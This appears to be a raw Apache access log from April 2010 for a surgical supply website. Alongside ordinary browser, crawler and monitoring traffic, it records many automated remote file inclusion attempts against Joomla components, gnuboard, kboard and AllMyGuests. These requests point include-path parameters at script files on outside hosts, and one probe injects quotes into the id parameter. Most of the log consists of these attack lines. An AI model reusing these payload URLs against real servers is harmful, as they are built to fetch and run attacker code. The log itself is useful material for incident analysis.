72.197.222.105 - - [07/Apr/2010:00:24:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; eSobiSubscriber 2.0.4.16; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.197.222.105 - - [07/Apr/2010:00:24:44 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; eSobiSubscriber 2.0.4.16; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.197.222.105 - - [07/Apr/2010:00:24:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; eSobiSubscriber 2.0.4.16; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.197.222.105 - - [07/Apr/2010:00:24:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 2.0.50727; eSobiSubscriber 2.0.4.16; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
220.181.7.91 - - [07/Apr/2010:00:25:06 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [07/Apr/2010:00:25:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.15.158.246 - - [07/Apr/2010:00:26:21 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:00:26:21 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:00:26:21 -0400] "GET /logs/error_log.Q109092900%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:00:26:33 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:00:26:34 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:00:26:34 -0400] "GET /logs/access_log.Q109072000//components/com_simpleboard/image_upload.php?sbp=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
164.115.5.63 - - [07/Apr/2010:00:26:40 -0400] "GET /logs/access_log.Q110031600/board/delete.php?_SERVER[DOCUMENT_ROOT]=http://www.kyosan.com.tw/appserv/id1????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
164.115.5.63 - - [07/Apr/2010:00:26:41 -0400] "GET /logs/access_log.Q110011600/board/delete.php?_SERVER[DOCUMENT_ROOT]=http://www.kyosan.com.tw/appserv/id1????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:00:26:49 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:00:27:24 -0400] "GET /logs/access_log.Q110010700/////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:00:27:24 -0400] "GET /////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:00:27:24 -0400] "GET /logs/////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:00:27:29 -0400] "GET /logs/access_log.Q109051600/////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:00:28:53 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011AFD5955312600A9BB05E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
70.79.65.19 - - [07/Apr/2010:00:29:01 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
70.79.65.19 - - [07/Apr/2010:00:29:01 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
70.79.65.19 - - [07/Apr/2010:00:29:12 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.15.158.246 - - [07/Apr/2010:00:29:23 -0400] "GET /logs/access_log.Q109121400%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:00:31:03 -0400] "GET /logs/access_log.Q109111500%20%20/////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:00:31:03 -0400] "GET /logs/////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:00:31:03 -0400] "GET /////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:00:31:09 -0400] "GET /images/_notes/download_EZ_PRP_lg.jpg.mno HTTP/1.1" 200 258 "-" "Yandex/1.01.001 (compatible; Win16; I)"
188.165.195.229 - - [07/Apr/2010:00:31:23 -0400] "GET /logs/access_log.Q109121200%20%20/////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:00:32:13 -0400] "GET /logs//start.php?pag=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:00:32:13 -0400] "GET //start.php?pag=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:00:32:13 -0400] "GET /logs/access_log.Q109071800%20%20//start.php?pag=http://www.goodigood.com//js/edit.files/ver1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:33:16 -0400] "GET /logs/access_log.Q110030600//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:33:20 -0400] "GET /logs/error_log.Q110030600//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
124.217.198.155 - - [07/Apr/2010:00:33:34 -0400] "GET /http://www.bowlingkorea.com/member/icq.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
209.59.12.99 - - [07/Apr/2010:00:33:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.93.147.154 - - [07/Apr/2010:00:35:48 -0400] "GET /logs/access_log.Q110030600//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:35:48 -0400] "GET //lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:35:48 -0400] "GET /logs//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:35:58 -0400] "GET /logs/error_log.Q110030600//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
124.217.198.155 - - [07/Apr/2010:00:36:26 -0400] "GET /logs/access_log.Q110030600/http://www.bowlingkorea.com/member/icq.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
124.217.198.155 - - [07/Apr/2010:00:36:27 -0400] "GET /http://www.bowlingkorea.com/member/icq.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
124.217.198.155 - - [07/Apr/2010:00:36:27 -0400] "GET /logs/http://www.bowlingkorea.com/member/icq.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
124.217.198.155 - - [07/Apr/2010:00:36:40 -0400] "GET /logs/error_log.Q110030600/http://www.bowlingkorea.com/member/icq.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
95.108.128.242 - - [07/Apr/2010:00:37:43 -0400] "GET /images/_notes/nav_store_cart_over_r1_c5.jpg.mno HTTP/1.1" 200 211 "-" "Yandex/1.01.001 (compatible; Win16; I)"
61.67.201.187 - - [07/Apr/2010:00:38:26 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:26 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:26 -0400] "GET /logs/access_log.Q110020700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:38 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:38 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:38 -0400] "GET /logs/access_log.Q110020700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:45 -0400] "GET /logs/access_log.Q110020700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:45 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:45 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:46 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:46 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:46 -0400] "GET /logs/access_log.Q110020700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:49 -0400] "GET /logs/access_log.Q110020700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:49 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:49 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:58 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:58 -0400] "GET /logs/access_log.Q110020700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:38:58 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:41:30 -0400] "GET /logs/access_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.224.130.153 - - [07/Apr/2010:00:41:48 -0400] "GET /logs//adminhead.php?path[docroot]=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.224.130.153 - - [07/Apr/2010:00:41:48 -0400] "GET //adminhead.php?path[docroot]=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.224.130.153 - - [07/Apr/2010:00:41:54 -0400] "GET /logs/access_log.Q109051400//adminhead.php?path[docroot]=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.224.130.153 - - [07/Apr/2010:00:41:59 -0400] "GET //adminhead.php?path[docroot]=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.224.130.153 - - [07/Apr/2010:00:41:59 -0400] "GET /logs/access_log.Q109051400%20%20//adminhead.php?path[docroot]=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.224.130.153 - - [07/Apr/2010:00:41:59 -0400] "GET /logs//adminhead.php?path[docroot]=http://dewa9.110mb.com/ide1.pdf? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:00:42:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.67.201.187 - - [07/Apr/2010:00:42:06 -0400] "GET /logs/access_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:42:07 -0400] "GET /logs/access_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:42:08 -0400] "GET /logs/access_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:00:42:09 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:00:42:09 -0400] "GET /logs/access_log.Q110032100%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:00:42:10 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:42:13 -0400] "GET /logs/access_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:42:14 -0400] "GET /logs/access_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:42:21 -0400] "GET /logs/access_log.Q110022700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:42:34 -0400] "GET /logs/access_log.Q110022700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:42:36 -0400] "GET /logs/access_log.Q110022700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:42:37 -0400] "GET /logs/access_log.Q110022700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:42:40 -0400] "GET /logs/access_log.Q110022700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.67.201.187 - - [07/Apr/2010:00:42:44 -0400] "GET /logs/access_log.Q110022700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:00:42:54 -0400] "GET /logs/access_log.Q110020600%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:00:43:51 -0400] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:00:43:51 -0400] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:00:43:51 -0400] "GET /logs/error_log.Q109081100%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.254.228.146 - - [07/Apr/2010:00:43:57 -0400] "GET /?id='' HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
95.108.128.242 - - [07/Apr/2010:00:44:16 -0400] "GET /images/_notes/home_connect_off.gif.mno HTTP/1.1" 200 253 "-" "Yandex/1.01.001 (compatible; Win16; I)"
212.227.141.53 - - [07/Apr/2010:00:44:29 -0400] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:00:44:29 -0400] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:00:44:29 -0400] "GET /logs/error_log.Q109081100/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:00:44:58 -0400] "GET /images/nav04_conven_off.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
212.227.141.53 - - [07/Apr/2010:00:44:59 -0400] "GET /logs/access_log.Q109111500%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bboards.co.nz///data/file/bboards_cart////ver1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:45:35 -0400] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://janggu.com//janggu/data/file/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:45:38 -0400] "GET ///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://janggu.com//janggu/data/file/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:45:38 -0400] "GET /logs/error_log.Q109081200%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://janggu.com//janggu/data/file/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:45:42 -0400] "GET ///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://janggu.com//janggu/data/file/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:45:43 -0400] "GET /logs/error_log.Q109081200%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://janggu.com//janggu/data/file/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:45:45 -0400] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://janggu.com//janggu/data/file/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:46:46 -0400] "GET /logs//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:46:46 -0400] "GET /logs/access_log.Q110030600%20%20//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:46:48 -0400] "GET //lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:46:56 -0400] "GET //lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:46:58 -0400] "GET /logs/access_log.Q110030600%20%20//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:46:58 -0400] "GET /logs//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:47:02 -0400] "GET /logs/error_log.Q110030600%20%20//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:47:02 -0400] "GET /logs/error_log.Q110030600%20%20//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:47:22 -0400] "GET //lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:47:23 -0400] "GET /logs//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:47:23 -0400] "GET /logs/access_log.Q110030600%20%20//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:00:47:28 -0400] "GET /logs/error_log.Q110030600%20%20//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:00:47:35 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L010BDD521F32640007BC08P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.93.147.154 - - [07/Apr/2010:00:47:37 -0400] "GET /logs//lib/connect.lib.php?g4[path]=http://janggu.com//janggu/data/file/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
